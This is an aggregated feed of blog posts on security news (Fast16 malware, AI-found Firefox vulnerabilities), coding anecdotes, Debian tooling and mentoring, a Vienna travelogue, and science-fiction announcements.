Matthew Garrett wrote an interesting blog post about the potential security issues raised by non-free firmware and firmware updates [3]. Which goes well with Wouter’s post.

Interesting article about fake job adverts that include a code sample for the applicant to show their skills, which depends on hostile libraries that install a RAT [4]. Do we need Qubes for software development nowadays?

Bruce Schneier wrote an insightful and informative article about the two-tiered Internet access scheme in Iran and how it is bad for society [5].

Caleb Hearth gave an interesting talk Don’t Get Distracted about the often ignored unethical uses of software [6].

Techdirt has an insightful article from 2025 Fascism For First Time Founders about why it’s a bad idea for tech companies to support fascism, this aged very well [7].

Dr. Bret C. Devereaux wrote an informative blog post about why fascists always fail at war, and also authoritarians in general [8].

Bruce Schneier and Nathan Sanders wrote an interesting blog post about the new Japanese political party Team Mirai, we need this sort of party in every country to save democracy [9].

Sam Varghese wrote an insightful article about the current situation in Israel and Iran and the poor performance of Australian journalists in covering the issues [10].

Louis Rossman made a video about the Norwegian Consumer Council’s advertising campaign about Enshittification, he includes an excellent advert that the Norwegians produced [11].

Marga Manterola gave a really good talk at Fosdem 2026 “Free as in Burned Out: Who Really Pays for Open Source?” [12].

Cryptogram Fast16 Malware

Researchers have reverse-engineered a piece of malware named Fast16. It’s almost certainly state-sponsored, probably US in origin, and was deployed against Iran years before Stuxnet:

“…the Fast16 malware was designed to carry out the most subtle form of sabotage ever seen in an in-the-wild malware tool: By automatically spreading across networks and then silently manipulating computation processes in certain software applications that perform high-precision mathematical calculations and simulate physical phenomena, Fast16 can alter the results of those programs to cause failures that range from faulty research results to catastrophic damage to real-world equipment.”

Another news article.

Lots of interesting details at the links.

365 TomorrowsNo Salvation in the Dawn

Author: R. J. Erbacher I was lying on a beach, naked under a blanket, having just made love to my wife, and we were gazing at the stars. An intense fireplace of driftwood crackled in a hole scooped out of the sand and the only other sound was the soothing pulse of the waves breaking […]

The post No Salvation in the Dawn appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Cancel Catch

"This WTF is in Matlab" almost feels like cheating. At one place I worked, somebody's job was struggling through a mountain of Matlab code and porting it into C. "This Matlab code looks like it was written by an alien," also doesn't really get much traction- all Matlab code looks like it was written by an alien. This falls into the realm of "Researchers use Matlab, researchers may be very smart about their domain, but generally don't know the first thing about writing maintainable code, because that's not their job."

But let's take a look at some MatLab Carl W found:

    try
        if (~isempty(fieldnames(bigStruct)) && isfield(bigStruct,'pathName'))
            [FileName, PathName] = uigetfile(bigStruct.pathName);
        else
            [FileName, PathName] = uigetfile(lastPath); %lastPath holds previous path
        end
    catch
        bigStruct = struct;
    end

The uigetfile function opens a file dialog box. When the user selects a file, FileName holds the filename, PathName holds the containing path. If the user doesn't select a valid file, or clicks "Cancel", both of those variables get set to 0. It's then up to the caller to check the return value and decide what happens next.

Which is not what happens here, obviously. The developer responsible seems to believe that it maybe throws an exception? And they can just catch it? Carl's best guess is that this is a "weird" way to catch the cancel button. But it does mean that FileName and PathName get set to 0, and those zeros propagate until something finally tries to open those files, at which point everything blows up and the user doesn't know why.
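
For contrast, the usual way to handle this is to check the return value before using it — something like the following sketch, which reuses the variable names from the snippet above and is not the original author's code:

    [FileName, PathName] = uigetfile(lastPath);
    if isequal(FileName, 0)
        % The user cancelled (uigetfile returns 0 for both outputs),
        % so bail out here instead of letting the zeros propagate.
        return;
    end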

[Advertisement] Plan Your .NET 9 Migration with Confidence
Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!

Planet DebianSergio Cipriano: How to build reverse dependencies using Salsa CI

How to build reverse dependencies using Salsa CI

Last week, I attended MiniDebConf Campinas, and one of my favorites talks was "Salsa CI, showing features that almost nobody knows" by Aquila Macedo.

One of the things I learned is that we can easily build reverse dependencies using:

$ git push -o ci.variable="SALSA_CI_DISABLE_BUILD_REVERSE_DEPENDENCIES=0"

I tried this option before uploading typer version 0.20.0-1:

example of salsa ci build rdeps working

This is an amazing feature. Thanks to everyone involved in making it happen!

Planet DebianOtto Kekäläinen: Mentoring Mondays for aspiring Debian contributors

Featured image of post Mentoring Mondays for aspiring Debian contributors

I mentor several people in Debian, and have been repeatedly asked to offer an opportunity to ask questions on a live call. I have now started a recurring video call for exactly that, which I call Mentoring Mondays, and it is open for anyone aspiring to contribute to Debian, one of the oldest and most widely used Linux distributions.

Mentoring Mondays have already been happening for the past few Mondays, and this week we had a record 20 people on the call. During the calls so far we have had a demo of updating a package for a new upstream release using gbp, and of how to create a Merge Request on Salsa for a new upstream version. There is clearly a need for this, so I am announcing this now also on my blog, just as I have publicly announced that I offer mentoring for aspiring Debian contributors.

What is Mentoring Mondays?

Mentoring Mondays is a recurring video call that lasts roughly 45 minutes with the agenda:

  • Weekly walk-through: demo of something in Debian packaging, explaining the what and why
  • Discussion on pros and cons to help participants develop their judgment
  • Questions & answers on Debian packaging, or open source contributing in general

This is ideal for you if you:

The call is mainly intended for those who want to contribute to Debian (or Debian derivatives, with Ubuntu being the most popular), but anyone can join to learn about things related to contributing to a Linux distribution. Please note that video chat uses Debian Social Jitsi. Joining the call requires authentication using a Salsa account, which anyone contributing to Debian should have anyway.

Calls are not recorded, so participants can chat freely, and are also encouraged to be on-camera for an enhanced sense of community.

Next call: Monday May 4th, 2026

Make sure you are logged into Salsa first, before opening the call on Debian’s Jitsi instance.

Matrix channel and future meeting time announcements

Please join the Matrix channel #mentoringmondays:matrix.debian.social if you plan to attend Mentoring Mondays. All future meeting times will be announced there. It is also the channel to post questions about Debian packaging to be answered during the call.

The current meeting time is friendly to people in Europe, Asia and Australian time zones, and will repeat at the same time slot on:

  • May 11th, 2026 at 12:30 UTC
  • May 18th, 2026 at 12:30 UTC
  • May 25th, 2026 at 12:30 UTC
  • June 1st, 2026 at 12:30 UTC
  • June 8th, 2026 at 12:30 UTC

Starting in mid-June the meeting time will change to accommodate participation in different time zones.

Spread the word

Feel free to extend the invite to anyone you think might be interested in joining!

If you mention this on social media, please post using tag #mentoringmondays, or simply boost the existing posts on the social media of your preference: Mastodon, Lemmy, Reddit, Bluesky, LinkedIn, Farcaster, X.

Thanks

A big thanks to Jason Kregting for helping organize. I would also like to thank in advance all the Debian Developers who are able to join the call and be available to participate in discussions and help answer questions.

,

Cryptogram Claude Mythos Has Found 271 Zero-Days in Firefox

That’s a lot. No, it’s an extraordinary number:

Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser. We wrote previously about our collaboration with Anthropic to scan Firefox with Opus 4.6, which led to fixes for 22 security-sensitive bugs in Firefox 148.

As part of our continued collaboration with Anthropic, we had the opportunity to apply an early version of Claude Mythos Preview to Firefox. This week’s release of Firefox 150 includes fixes for 271 vulnerabilities identified during this initial evaluation.

As these capabilities reach the hands of more defenders, many other teams are now experiencing the same vertigo we did when the findings first came into focus. For a hardened target, just one such bug would have been red-alert in 2025, and so many at once makes you stop to wonder whether it’s even possible to keep up.

Our experience is a hopeful one for teams who shake off the vertigo and get to work. You may need to reprioritize everything else to bring relentless and single-minded focus to the task, but there is light at the end of the tunnel. We are extremely proud of how our team rose to meet this challenge, and others will too. Our work isn’t finished, but we’ve turned the corner and can glimpse a future much better than just keeping up. Defenders finally have a chance to win, decisively.

They’re right. Assuming the defenders can patch, and push those patches out to users quickly, this technology favors the defenders.

News article.

365 TomorrowsEpic!

Author: Elliott Fielding “I need to think about it.” “But can’t you just pick now? You’re the tiebreaker and we’ve got to decide.” Jene was worried. Making a group decision was stressful; prices changed fast. “Dude, I told you, I need to think about it,” Kol huffed. “Fine. When can you let me know?” “In […]

The post Epic! appeared first on 365tomorrows.

Worse Than FailureA Whale of a Problem

From our Anonymous submitter:

Our company creates graphs to visualize data. We have many small fish customers, but we have one whale who uses our product that is 90% of company revenue. (WTF number 1.)

So if he is not happy, it's all-hands-on deck-mode.

He complained that our APIs and charts are loading slowly for him. For 3 weeks, we've tried a TON of optimizations, including WTF 2: spinning up a special server he alone can hit.

Today, we found out that he's always complaining when he's in his car, driving from home to the office. But since he "totally has the best wifi money can buy," that isn't worth investigating.

WTF 3: thinking wifi and data are always 100% reliable in a car driving around.

Humpback whale breaching in Ballena Marine National Park

Our submitter highlights one of the major pitfalls of the so-called whale client: if they're a bad client, you're in for an extra-bad time.

As I lean harder into freelancing, I'm learning to scan the waters ahead of me for potential whales. My goal is to build up multiple small, diverse income streams, because I've had my own dangerous encounters with whales in the past.

At one employer of mine, there was Facebook, who acted as if they were our new owners rather than a new customer. They'd already produced flashy marketing videos of the sorts of solutions they planned to implement with our software, showing people delighted with the results. In meetings, these things were talked up as amazing game-changers. Meanwhile, I found all the things Facebook wanted to do horribly creepy and invasive.

Even worse, Facebook began dictating how our award-winning technical support should change to accommodate their whims, up to and including having a dedicated toady—er, support rep—who did nothing but field Facebook-related tickets, similar to a technical account manager (TAM).

That was the last straw for me. I left that company before I was forced to deal with any of Facebook's crap.

My second whale sighting occurred at a startup that'd landed Porsche, far and away their biggest client ever. All of a sudden, our timeline for adding new features and fixing bugs became Porsche's honey-do list. All of a sudden, the platform frequently crashed and became unusable for everyone because it couldn't handle the amount of traffic Porsche (and their clients) hurled at it.

On the other hand, there were several times in that startup's existence when a big wad of promised funding failed to materialize. Porsche kept the business afloat and literally kept my lights on.

I find it less than ideal to be at any company's mercy. I want a world that would neither spawn whales nor millions of startups named Sploink, Dink, and Twangle that promise to bring the power of AI to your dinner fork.

Have your own epic whaling adventures? Share with us in the comments!

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

,

Cryptogram What Anthropic’s Mythos Means for the Future of Cybersecurity

Two weeks ago, Anthropic announced that its new model, Claude Mythos Preview, can autonomously find and weaponize software vulnerabilities, turning them into working exploits without expert guidance. These were vulnerabilities in key software like operating systems and internet infrastructure that thousands of software developers working on those systems failed to find. This capability will have major security implications, compromising the devices and services we use every day. As a result, Anthropic is not releasing the model to the general public, but instead to a limited number of companies.

The news rocked the internet security community. There were few details in Anthropic’s announcement, angering many observers. Some speculate that Anthropic doesn’t have the GPUs to run the thing, and that cybersecurity was the excuse to limit its release. Others argue Anthropic is holding to its AI safety mission. There’s hype and counterhype, reality and marketing. It’s a lot to sort out, even if you’re an expert.

We see Mythos as a real but incremental step, one in a long line of incremental steps. But even incremental steps can be important when we look at the big picture.

How AI Is Changing Cybersecurity

We’ve written about shifting baseline syndrome, a phenomenon that leads people—the public and experts alike—to discount massive long-term changes that are hidden in incremental steps. It has happened with online privacy, and it’s happening with AI. Even if the vulnerabilities found by Mythos could have been found using AI models from last month or last year, they couldn’t have been found by AI models from five years ago.

The Mythos announcement reminds us that AI has come a long way in just a few years: The baseline really has shifted. Finding vulnerabilities in source code is the type of task that today’s large language models excel at. Regardless of whether it happened last year or will happen next year, it’s been clear for a while this kind of capability was coming soon. The question is how we adapt to it.

We don’t believe that an AI that can hack autonomously will create permanent asymmetry between offense and defense; it’s likely to be more nuanced than that. Some vulnerabilities can be found, verified, and patched automatically. Some vulnerabilities will be hard to find but easy to verify and patch—consider generic cloud-hosted web applications built on standard software stacks, where updates can be deployed quickly. Still others will be easy to find (even without powerful AI) and relatively easy to verify, but harder or impossible to patch, such as IoT appliances and industrial equipment that are rarely updated or can’t be easily modified.

Then there are systems whose vulnerabilities will be easy to find in code but difficult to verify in practice. For example, complex distributed systems and cloud platforms can be composed of thousands of interacting services running in parallel, making it difficult to distinguish real vulnerabilities from false positives and to reliably reproduce them.

So we must separate the patchable from the unpatchable, and the easy to verify from the hard to verify. This taxonomy also provides us guidance for how to protect such systems in an era of powerful AI vulnerability-finding tools.

Unpatchable or hard to verify systems should be protected by wrapping them in more restrictive, tightly controlled layers. You want your fridge or thermostat or industrial control system behind a restrictive and constantly updated firewall, not freely talking to the internet.

Distributed systems that are fundamentally interconnected should be traceable and should follow the principle of least privilege, where each component has only the access it needs. These are bog-standard security ideas that we might have been tempted to throw out in the era of AI, but they’re still as relevant as ever.

Rethinking Software Security Practices

This also raises the salience of best practices in software engineering. Automated, thorough, and continuous testing was always important. Now we can take this practice a step further and use defensive AI agents to test exploits against a real stack, over and over, until the false positives have been weeded out and the real vulnerabilities and fixes are confirmed. This kind of VulnOps is likely to become a standard part of the development process.

Documentation becomes more valuable, as it can guide an AI agent on a bug-finding mission just as it does developers. And following standard practices and using standard tools and libraries allows AI and engineers alike to recognize patterns more effectively, even in a world of individual and ephemeral instant software—code that can be generated and deployed on demand.

Will this favor offense or defense? The defense eventually, probably, especially in systems that are easy to patch and verify. Fortunately, that includes our phones, web browsers, and major internet services. But today’s cars, electrical transformers, fridges, and lampposts are connected to the internet. Legacy banking and airline systems are networked.

Not all of those are going to get patched as fast as needed, and we may see a few years of constant hacks until we arrive at a new normal: where verification is paramount and software is patched continuously.

This essay was written with Barath Raghavan, and originally appeared in IEEE Spectrum.

Planet DebianAbhijith PA: Patience could've saved me time.

If I had been patient, it would have saved me time. One such instance follows.

From my early blogs, you might know that I use mutt for email. Soon after I got comfortable with mutt, I started using notmuch, because limiting searches in mutt is always a pain when you have multiple folders. And what better tool out there than notmuch-mutt to bind the two together.

notmuch-mutt provides three macros by default.

macro index <F8> \
"<enter-command>set my_old_pipe_decode=\$pipe_decode my_old_wait_key=\$wait_key nopipe_decode nowait_key<enter>\
<shell-escape>notmuch-mutt -r --prompt search<enter>\
<change-folder-readonly>`echo ${XDG_CACHE_HOME:-$HOME/.cache}/notmuch/mutt/results`<enter>\
<enter-command>set pipe_decode=\$my_old_pipe_decode wait_key=\$my_old_wait_key<enter>" \
      "notmuch: search mail"
macro index <F9> \
"<enter-command>set my_old_pipe_decode=\$pipe_decode my_old_wait_key=\$wait_key nopipe_decode nowait_key<enter>\
<pipe-message>notmuch-mutt -r thread<enter>\
<change-folder-readonly>`echo ${XDG_CACHE_HOME:-$HOME/.cache}/notmuch/mutt/results`<enter>\
<enter-command>set pipe_decode=\$my_old_pipe_decode wait_key=\$my_old_wait_key<enter>" \
      "notmuch: reconstruct thread"
macro index <F6> \
"<enter-command>set my_old_pipe_decode=\$pipe_decode my_old_wait_key=\$wait_key nopipe_decode nowait_key<enter>\
<pipe-message>notmuch-mutt tag -- -inbox<enter>\
<enter-command>set pipe_decode=\$my_old_pipe_decode wait_key=\$my_old_wait_key<enter>" \
      "notmuch: remove message from inbox"

One for search, one for reconstructing threads, and one for manipulating tags, which is the one I missed.

Now for my impatient part. I had already mapped F6 to my folder movements, and in my early days with notmuch I only used search, so I never cared about the F6 macro provided by notmuch-mutt. As time went by, I got very comfortable with notmuch and started stretching my notmuch legs: I began living more in notmuch search results like date:today tag:unread than in the mutt index. Now to the problem: since notmuch-mutt dumps all results into a temporary maildir, flag changes cannot be carried back to the original maildir. That was annoying, because you need to distinguish read from unread mail when you are subscribed to most of the Debian mailing lists.
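
For context, this is roughly what those two pieces look like on the notmuch command line (the query and the message-id below are just examples, not from my actual setup):

# the kind of saved search I was living in
notmuch search date:today and tag:unread

# tag manipulation at the CLI level; the F6 macro above effectively does this
# for the message that mutt pipes to notmuch-mutt
notmuch tag -inbox -- id:some-message-id@example.org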

I was under the impression that notmuch-mutt was not capable of doing this, and I carried on like that without checking the docs. I started doing all sorts of crazy hacks to sync these maildirs.

I even started reading the notmuch-mutt codebase.

Later, I settled on notmuch-vim, because with it I could manipulate flags and sync them back from notmuch to the maildir.

And while searching for something, I accidentally revisited the notmuch-mutt macro page and saw the tag manipulation. I was like :(.

If I had read about the third macro patiently when I added it to my config, I could have saved time by not building ugly hacks around it.

I think I learned my lesson.

Worse Than FailureCodeSOD: Lint Brush Off

A few years back, C# added the concept of "primary constructors". Instead of declaring the storage for class members and then initializing them in the constructor, you can annotate the class itself with the required fields, and C# automatically generates a constructor for you. It's all very TypeScript and very Microsoft, and certainly cuts down on some boilerplate.
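
For anyone who hasn't run into the feature, here's a rough sketch of the before and after, using a hypothetical class purely for illustration:

// Before: declare the field, then initialize it in a constructor.
public class ReportService
{
    private readonly IClock _clock;

    public ReportService(IClock clock)
    {
        _clock = clock;
    }
}

// After: a primary constructor (C# 12). The parameter is in scope
// throughout the class body, and the boilerplate goes away.
public class ReportService(IClock clock)
{
}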

Esben B's team isn't really using them in many places, but they are using a linter which is opinionated about them. So this in-line constructor causes the linter to complain:

    public DocumentNetworkController(ILookupClient service)

The linter wants you to switch this to a primary constructor. Esben didn't want to do that, and didn't want to change the global linter configuration, and so added a pragma to disable that particular warning:

#pragma warning disable IDE0290 // Use primary constructor
    public DocumentNetworkController(ILookupClient service)
#pragma warning restore IDE0290

The linter didn't like this. It threw a new warning: that this suppression wasn't needed. Which was news to Esben, as clearly the suppression was needed if you wanted to make the warnings go away. The obvious solution was to disable the warning that you didn't need to disable the warning:

#pragma warning disable IDE0079, IDE0290 // Use primary constructor
    public DocumentNetworkController(ILookupClient service)
#pragma warning restore IDE0290, IDE0079

Except this doesn't work. These pragmas take effect on the next line, which means you can't disable IDE0079 on the same line as IDE0290 and expect it to work. Which means the final version of the code looked like this:

#pragma warning disable IDE0079 // Disable warning about not needed supression
#pragma warning disable IDE0290 // Use primary constructor
    public DocumentNetworkController(ILookupClient service)
#pragma warning restore IDE0290, IDE0079

Esben writes:

So the nice recommendation to use a primary ctor ended up with 3 lines of annoying boilerplate code. Good times \o/

While yes, this is frustrating, I will say there's an element of "when the table saw keeps taking fingers off, that may be more of a you problem." I don't know the details, so I can't say, "just change the linter config or adopt its recommendation" and claim that the problem goes away, but when the tool hurts you, it's a definite sign of one of two things: it's either the wrong tool, or you're using it wrong.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsDensity

Author: Majoki While Mr. Patella lectured on quantum entanglement, Jeremy’s right hand almost slipped through his desk. His fingers and palm were halfway through the scratched laminate surface before he noticed. He felt himself gradually slipping through the rigid plastic of his chair. A prickly panic edging down his spine, he looked around to see […]

The post Density appeared first on 365tomorrows.

Planet DebianRavi Dwivedi: A day in Vienna

On the 7th of September 2025, my friend Dione and I had a day trip to Vienna—the capital of Austria. We were attending a conference in Budapest, Hungary, which is 250 km from Vienna. So, it was a good opportunity to visit Vienna.

We took a morning train from Budapest to Vienna and got back to Budapest by night. However, booking these tickets turned out to be a bit complicated. There were many websites to book the train ticket—Hungarian Railways, Austrian Railways, and third-party sites such as Omio. All these websites had different prices for the same ticket.

I booked the tickets from the Hungarian Railways website as it was the cheapest. The train from Budapest to Vienna was €13, operated by Eurocity. Also, I had to pay €2 for the seat reservation on top. The train from Vienna to Budapest—operated by Railjet—was €21, along with €2 extra for reservation again—making it €23. The tickets for the two-way journey added up to €38.

The cost of these tickets varied depending on when one purchases them: the sooner you purchase, the lower the price. I bought my tickets 15 days ahead of the date of the journey and paid just €38. In contrast, Dione booked just one day before her trip and paid around €100 for her tickets.

As for the seat reservation, long-distance trains in Europe usually require paying extra to reserve a seat. This ensures that you get your preferred seat, such as a window or an aisle seat. You will get a seat even without a reservation, though, because long-distance trains do not sell more tickets than there are seats. However, we reserved our seats so that we could sit together. This helped us more on the return leg of the journey—from Vienna to Budapest—which was more crowded than the train we took from Budapest to Vienna in the morning.

On another note, reservation is mandatory on some trains in Europe, but ours wasn’t one of them. In addition, people also use rail passes, so an extra charge is required on top for reserving the seats for pass holders. On the other hand, local trains do not require seat reservations in general.

Our train’s scheduled departure was at 08:55 from the Budapest Kelenfold station. We reached the train station 40 minutes before the train’s scheduled departure. The Kelenfold station had free Wi-Fi, which was handy because I didn’t have a local SIM.

A departures board at Budapest Kelenfold station.

A departures board at Budapest Kelenfold station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

A platform on Budapest Kelenfold station.

This is platform number 15 of Budapest Kelenfold station where we boarded our train. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Our train arrived on time. I tried to find our coach number but could not find the numbers written anywhere on the side of the coach. Luckily, we were helped by a fellow passenger who directed me to look at the doors, where the numbers were mentioned clearly!

Then we got into our compartment and took our respective seats. Our tickets were checked twice - once while the train was in Hungary and once in Austria. Showing the PDF of the train ticket on our mobiles to the ticket inspector was good enough for the purpose. Austria and Hungary are both part of the border-free Schengen area, which means this was the extent of the checks we had to go through.

Interior of the train.

Interior of our Budapest to Vienna train. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The train also had free Wi-Fi, albeit with poor connection at times. There were no eatery options inside the train.

We deboarded at the Wien Hauptbahnhof station in Vienna. The journey was 250 km and took 2.5 hours, reaching Vienna at 11:25, which was the scheduled time.

A blue and white colored train on a railway platform

This blue colored train was the one we took for our Budapest to Vienna journey. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

A red colored train standing at the Vienna station

An ÖBB train standing at a platform of Vienna train station. ÖBB is the national carrier of Austria. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Wien Hauptbahnhof train station

Wien Hauptbahnhof train station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

At the station, we bought a 24-hour public transport pass from a ticket machine for €8. The pass includes unlimited access to all public transport in Vienna for 24 hours. My pass was valid from the 7th of September at 11:34 to the 8th of September at 11:33. A single public transport ticket (from anywhere to anywhere) costs €2.40 and can be used once on any public transport in Vienna—trams, metros, and buses.

Therefore, the pass is a good deal if you are going to take at least four public transport trips in a day. Unlike the public transport pass I got in Budapest, the pass in Vienna was anonymous and not tied to the rider’s name.

Public transport pass for Vienna.

My public transport pass in Vienna.

We wanted to visit the Schönbrunn Palace, which was reachable by subway. To get to the subway station, we started by going outside the train station, but it was not there. So we came back inside the station building and realized that the subway was underground.

We took the subway and deboarded at the Schönbrunn subway station—the closest one to the palace. The ride was smooth; the train was pretty silent.

By the way, as in Budapest, there were no AFC (automated fare collection) gates for boarding the subway in Vienna. The stations had ticket validators instead, where you are supposed to validate your ticket before getting on the subway.

Vienna subway

Instead of AFC gates, Vienna has ticket validators as in the picture. You need to tap your ticket in the validator before boarding the subway. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

These validators are in place to ensure that you use your ticket only once. Unlike AFC gates, which are present in metros of most of the countries I have been to, the ticket validators don’t act as a physical barrier to enter the boarding area.

If you board the metro without validating your ticket, you will face a hefty fine if caught. I have heard that the fine is around €100. On the other hand, if you have a public transport pass like we did, then you don’t need to validate it before boarding.

In addition, there were no annoying security checks either, unlike in Indian cities. In the Delhi metro, for example, you would need to scan your bags and pass through a security check before getting to the AFC gates.

Vienna subway

Vienna subway. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Now back to the story, after alighting at the Schönbrunn subway station, we walked to the Schönbrunn Palace. One can roam around outside the palace and click pictures for free. To go inside, however, requires buying tickets. The tickets for the palace can be booked in advance on the internet. We didn’t take the tickets in advance, as we decided to visit the palace at the last moment.

So we went to the ticket counter and found out that we needed to wait for 1 hour 40 minutes before going inside if we took the tickets at that moment. In addition, one ticket costs €44 (around 4000 Indian rupees). Since we had to return to Budapest in the evening and only had a few hours in the city, we decided not to go inside the palace. Instead, we clicked a few pictures outside the palace.

Photo of Schönbrunn Palace.

Schönbrunn Palace. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The Schönbrunn Palace is a UNESCO World Heritage Site and a historically significant place. It served as one of the residences of the powerful Habsburg dynasty. The palace looked so good that my friend Dione said, “It seemed like the palace was built yesterday”. The remark applied to other parts of Vienna we went to as well. For example, the subway stations also seemed like they were built yesterday.

A street near Schönbrunn Palace.

A street near Schönbrunn Palace. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Now, we wanted to go someplace to grab a bite. I asked my friend Urbec for suggestions on where to go. They suggested we visit the steps named Strudlhofstiege, which had the added benefit of being in a neighborhood with good bakeries and buildings.

So, we took the subway, deboarded at the Roßauer Lände station, and then walked around a kilometer to reach the stairs.

A subway station in Vienna.

Roßauer Lände subway station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Platform of the _Roßauer Lände_ subway station.

Platform of the Roßauer Lände subway station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

stairs with road in the front and trees in the background. Blue sky can also be seen in the background.

The Strudlhofstiege steps. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

On the way, we were also looking for a place to eat. Unfortunately, it was Sunday, and Vienna closes on Sunday. That means most of the shops—including bakeries and cafés—are closed. Only places like railway stations have shops open on Sundays.

By the way, walking around in the streets of Vienna was a treat. The streets were not crowded (as it was not exactly a touristy neighborhood) and had good pedestrian infrastructure, with clean streets and separate cycling tracks. The buildings were also beautiful.

Buildings and streets in Vienna.

A random street in Vienna.

Buildings and streets in Vienna.

Another street in Vienna.

After some walking, we found a restaurant open. I grabbed the menu to check the prices. A lady at the shop asked me what I was doing, and I told her that I was browsing the menu. She said that the menu was in German. I don’t know how she knew that we didn’t know German, but it seemed like a racist thing to be told.

We roamed around further and found a café by the name of Blue Orange, where we ordered coffee and croissants. When we got our order, the waiter told us that they were having some issues, so they wouldn’t charge us for the croissant if it wasn’t good.

Picture of a café.

A picture of Blue Orange café. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

My friend and I took a bite, and both of us didn’t like the croissant. After some time, the waiter came to us and asked whether the croissant was okay, to which we said no. Therefore, they didn’t charge us for the croissant. This was the first time something like this happened to me. It felt like I was in a different world. I added a small tip at the end for this gesture, which I had to put in a jar at the counter.

The cappuccino I ordered was €4.50, while the espresso that Dione ordered was €3.60. The croissant would have been €3.60. I remember Paris having cheaper croissants!

Then when the waiter brought our drinks out, they automatically gave me the espresso and Dione the cappuccino. Dione found this funny because there is a stereotype in her country (Australia) that men drink strong black coffee, and women drink milky drinks like cappuccinos. She found it interesting that this stereotype seems to exist in Austrian culture too.

We hopped on a tram to reach the nearest subway station and went to the Wien Hauptbahnhof station to have something before we caught our return train to Budapest.

Trams with buildings and the blue sky in the background

Trams in Vienna. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

At the station, I had Esterhazyschnitten and Punschkrapfen (thanks, Urbec, for the suggestion). The lady at the shop warned me that punschkrapfen had alcohol in it, to which I said okay.

Esterhazyschnitten was a cake made of almonds, while punschkrapfen was a jam-filled sponge cake, soaked in rum. Esterhazyschnitten was my favorite out of the two. The punschkrapfen was too sweet for my taste.

Punschkrapfen

Punschkrapfen. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Esterhazyschnitten

Esterhazyschnitten. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

While the station was well-built, there were a couple of things about Wien Hauptbahnhof that we didn’t like. There were no seats inside the station, so we had to eat outside the building. Also, the toilets had to be paid for: it costs 50 cents to use them at this station.

The Vienna train station had departure boards all over the place. So, we went to the platform our train was to arrive on.

A departure board in Vienna displaying information about the trains

Departure boards in Vienna displaying information about the trains. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Platform and tracks at Wien Hauptbahnhof station.

Platform and tracks at Wien Hauptbahnhof station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

When our train arrived, we had some difficulty locating our coach. This train was operated by a different company (Railjet) than the one we took in the morning (Eurocity) from Budapest to Vienna, and we were able to locate the coach numbers using the digital boards at the station: each coach had a digital board next to it on the platform displaying its number. However, that wasn’t the problem. Even after reading the coach numbers and trying to find ours, it didn’t appear where we expected in the sequence.

When we were not able to find our coach for a while, we asked a ticket inspector from the train who was standing on the platform. He directed us towards the front of the train, so we started running that way, as we didn’t know how long the train would stop.

As we ran toward our coach, we found that the engine of the rear train was coupled to the last coach of the front train. At that point, we realized that our train was actually two trains joined together. At a later station, the rear train parted ways and went towards Vienna Airport.

Inside our train.

Interior of the train we took from Vienna to Budapest. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

A red colored train standing on the platform of Budapest Kelenfold station.

This is the train we took for our return journey from Vienna to Budapest. It is standing on a platform in Budapest Kelenfold station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

We had a smooth journey and reached Budapest a couple of hours later.

Vienna is a beautiful city; we enjoyed being there, and we would like to visit the city again!

That’s it for now. Signing off. See you in the next one!

Credits: Thanks to Dione and Badri for proofreading.

,

David BrinScience Fiction News!

The next World Science Fiction Convention - LAConV - will be held in Anaheim near Los Angeles August 27-31 2026. Among the featured events will be a live performance of my science-fictional - and theological - play "The Escape!" (If you are a theater producer/director, contact me for a show pass!)

 

Science Fiction's prestigious Hugo Award finalist list came out this morning! Vote as a member of the 84th annual World Science Fiction Convention in Anaheim, California, or pick up a virtual membership, which gives you the ability to access some of our awesome programming from afar for just $85.00! Either way, if you join soon, you can vote in the Hugos!

(Hugo Awards are also great mantel ornaments, if you balance the effect with three of them. Take my word for that.)

Oh... hint... have a look at what might (I suggest) be a good nominee for Best SF-related nonfiction of 2026!

My nonfiction collection, Through Stranger Eyes: Reviews, Introductions, Tributes and Iconoclastic Essays - has been re-released.


== Good things to read, meanwhile ==


Barnes & Noble lists 25 basic science fictional ‘tropes’, giving examples of each, from teleportation to hyperdrive to alien invasion. My works are cited as examples twice. Fun list!

Now available in e-version! Subterranean sold out of their deluxe collector’s edition of The Best of David Brin. Now it’s available in e-version. And just released in paperback by Amazing Stories.

If you missed my serialized sci fi comedy novel entitled The Ancient Ones… here’s a link to the first 8 or so chapters with lovely illustrations. And lots of Yuks! (Or else yucks, you decide!)

Speaking of sci fi comedy… Dang. This Star Trek one - Beam Me Up, Bubba! - makes AI worthwhile!


And one more of mine: Can industrial innovation be restored, down at the level of amateurs, hobbyists and local love of skill? Here’s my own comic book about American innovation in the near future: TINKERERS!


Terry Pratchett's comedy series is now a fun movie: The Color of Magic.


And more pertinent than ever, for right now. “Brin reads the opening of EXISTENCE.”

 

      == Meanwhile… ==

Oh, human augmentation is also the topic of a whole chapter in ailien minds!


It's a theme that's straight outta sci fi and while I give talks to defense folks about Human Augmentation... the "Enhanced Games" will allow athletes who use performance-enhancing drugs, as in Achilles' Choice by Niven & Barnes. Let's have 5+ Olympics:


1. A return to a core one for amateurs

2. One for pros

3. The Special, of course for those who overcome so much

